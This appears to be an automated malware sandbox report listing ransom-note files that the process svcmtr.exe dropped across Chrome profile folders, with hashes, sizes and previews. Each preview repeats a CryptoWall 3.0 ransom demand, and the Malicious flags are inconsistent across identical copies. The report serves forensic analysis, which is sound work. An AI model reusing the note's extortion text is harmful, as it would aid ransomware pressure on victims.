                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\aa2de5f4-12f7-4e24-86b2-9ea3afd5e638\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\aa2de5f4-12f7-4e24-86b2-9ea3afd5e638\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\ECSerivceProvidersConfig\1\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\ECSerivceProvidersConfig\1\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\ECSerivceProvidersConfig\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\ECSerivceProvidersConfig\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
